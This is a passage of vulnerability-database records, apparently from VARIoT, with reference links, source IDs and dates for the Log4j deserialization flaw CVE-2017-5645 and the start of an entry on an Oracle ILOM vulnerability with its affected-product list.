"https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83%40%3cgithub.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd%40%3cgithub.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8%40%3cgithub.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3%40%3cissues.activemq.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9%40%3cdev.logging.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125%40%3cdev.logging.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917%40%3cannounce.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26%40%3cdev.tika.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f%40%3cgithub.beam.apache.org%3e", }, { trust: 1, url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826%40%3cissues.activemq.apache.org%3e", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-5645", }, { trust: 0.8, url: "https://www.redhat.com/mailman/listinfo/rhsa-announce", }, { trust: 0.8, url: "https://bugzilla.redhat.com/):", }, { trust: 0.8, url: "https://access.redhat.com/security/team/contact/", }, { trust: 0.8, url: "https://access.redhat.com/security/updates/classification/#important", }, { trust: 0.5, url: "https://access.redhat.com/security/team/key/", }, { trust: 0.5, url: "https://access.redhat.com/articles/11258", }, { trust: 0.4, url: "https://access.redhat.com/security/cve/cve-2017-5664", }, { trust: 0.4, url: "https://nvd.nist.gov/vuln/detail/cve-2017-5664", }, { trust: 0.3, url: "http://seclists.org/oss-sec/2017/q2/78", }, { trust: 0.3, url: "https://git-wip-us.apache.org/repos/asf?p=logging-log4j2.git;h=5dcc19215827db29c993d0305ee2b0d8dd05939d", }, { trust: 0.3, url: "http://www.apache.org/", }, { trust: 0.3, url: "https://logging.apache.org/log4j/2.x/", }, { trust: 0.3, url: "https://access.redhat.com/security/cve/cve-2017-7525", }, { trust: 0.3, url: "https://nvd.nist.gov/vuln/detail/cve-2017-7525", }, { trust: 0.3, url: "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform?version=6.4/", }, { trust: 0.2, url: "https://issues.jboss.org/):", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397@%3cissues.activemq.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917@%3cannounce.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd@%3cgithub.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f@%3cgithub.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8@%3cgithub.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83@%3cgithub.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44@%3cgithub.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287@%3cissues.beam.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3cissues.bookkeeper.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422@%3ccommits.doris.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3ccommits.druid.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3cissues.geode.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d@%3ccommits.logging.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc@%3cdev.logging.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125@%3cdev.logging.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9@%3cdev.logging.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad@%3cdev.tika.apache.org%3e", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-5647", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-5647", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-5648", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-5648", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2016-2510", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-3258", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-15691", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=distributions&product=jboss.fuse&version=7.3.1", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2018-11798", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-11798", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2016-2510", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2018-3258", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-15691", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en/red-hat-jboss-bpm-suite/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-7957", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=bpm.suite&downloadtype=securitypatches&version=6.4", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-7957", }, { trust: 0.1, url: "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=appplatform&downloadtype=securitypatches&version=6.4", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-7536", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/installation-guide/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2015-6644", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-7536", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-9970", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2015-6644", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2014-9970", }, { trust: 0.1, url: "https://nvd.nist.gov/vuln/detail/cve-2017-2582", }, { trust: 0.1, url: "https://access.redhat.com/documentation/en/red-hat-jboss-enterprise-application-platform/version-7.0/", }, { trust: 0.1, url: "https://access.redhat.com/security/cve/cve-2017-2582", }, ], sources: [ { db: "VULHUB", id: "VHN-113848", }, { db: "BID", id: "97702", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "PACKETSTORM", id: "143499", }, { db: "PACKETSTORM", id: "153344", }, { db: "PACKETSTORM", id: "144597", }, { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144359", }, { db: "PACKETSTORM", id: "144018", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-113848", }, { db: "BID", id: "97702", }, { db: "JVNDB", id: "JVNDB-2017-003152", }, { db: "PACKETSTORM", id: "143499", }, { db: "PACKETSTORM", id: "153344", }, { db: "PACKETSTORM", id: "144597", }, { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144359", }, { db: "PACKETSTORM", id: "144018", }, { db: "NVD", id: "CVE-2017-5645", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-04-17T00:00:00", db: "VULHUB", id: "VHN-113848", }, { date: "2017-04-17T00:00:00", db: "BID", id: "97702", }, { date: "2017-05-18T00:00:00", db: "JVNDB", id: "JVNDB-2017-003152", }, { date: "2017-07-25T23:14:47", db: "PACKETSTORM", id: "143499", }, { date: "2019-06-19T17:19:04", db: "PACKETSTORM", id: "153344", }, { date: "2017-10-12T23:35:39", db: "PACKETSTORM", id: "144597", }, { date: "2017-09-06T04:16:42", db: "PACKETSTORM", id: "144019", }, { date: "2017-09-05T23:23:00", db: "PACKETSTORM", id: "144013", }, { date: "2017-08-07T14:42:00", db: "PACKETSTORM", id: "143670", }, { date: "2017-09-27T06:16:15", db: "PACKETSTORM", id: "144359", }, { date: "2017-09-06T04:16:37", db: "PACKETSTORM", id: "144018", }, { date: "2017-04-17T21:59:00.373000", db: "NVD", id: "CVE-2017-5645", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2020-10-20T00:00:00", db: "VULHUB", id: "VHN-113848", }, { date: "2019-07-17T07:00:00", db: "BID", id: "97702", }, { date: "2017-05-18T00:00:00", db: "JVNDB", id: "JVNDB-2017-003152", }, { date: "2024-11-21T03:28:05.320000", db: "NVD", id: "CVE-2017-5645", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "remote", sources: [ { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144018", }, ], trust: 0.4, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Apache Log4j Vulnerable to unreliable data deserialization", sources: [ { db: "JVNDB", id: "JVNDB-2017-003152", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "arbitrary", sources: [ { db: "PACKETSTORM", id: "144019", }, { db: "PACKETSTORM", id: "144013", }, { db: "PACKETSTORM", id: "143670", }, { db: "PACKETSTORM", id: "144018", }, ], trust: 0.4, }, }
var-201607-0174
Vulnerability from variot
Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality and integrity via vectors related to Emulex. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in Integrated Lights Out Manager. The vulnerability can be exploited over the 'HTTPS' protocol. The 'Emulex' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0174", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 3, vendor: "oracle", version: "3.0", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jre update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.092", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.8.091", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.7.0101", }, { model: "jdk update", scope: "eq", trust: 0.9, vendor: "oracle", version: "1.6.0115", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3.60", }, { model: "weblogic server", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "webcenter sites", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.16", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.14", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.13", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.12", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.11", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.10", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.9", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.8", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.18", }, { model: "vm virtualbox", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "utilities work and asset management", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.9.1.2.8", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.3.5", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.2.12", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.12.0.1.16", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.5.4", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.11.0.4.41", }, { model: "utilities network management system", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.10.0.6.27", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.3.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.2.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1.0.1.0", }, { model: "utilities framework", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.0.0.0", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.5", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.4", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.3", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.2", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.1", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.7", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3.6", }, { model: "transportation management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "switch es1-24", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.3", }, { model: "sun network qdr infiniband gateway switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "sun network 10ge switch 72p", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2", }, { model: "sun data center infiniband switch", scope: "eq", trust: 0.3, vendor: "oracle", version: "362.2.2", }, { model: "sun blade ethernet switched nem 24p 10ge", scope: "eq", trust: 0.3, vendor: "oracle", version: "60001.2", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m9000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m8000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m5000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m4000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1118", }, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: 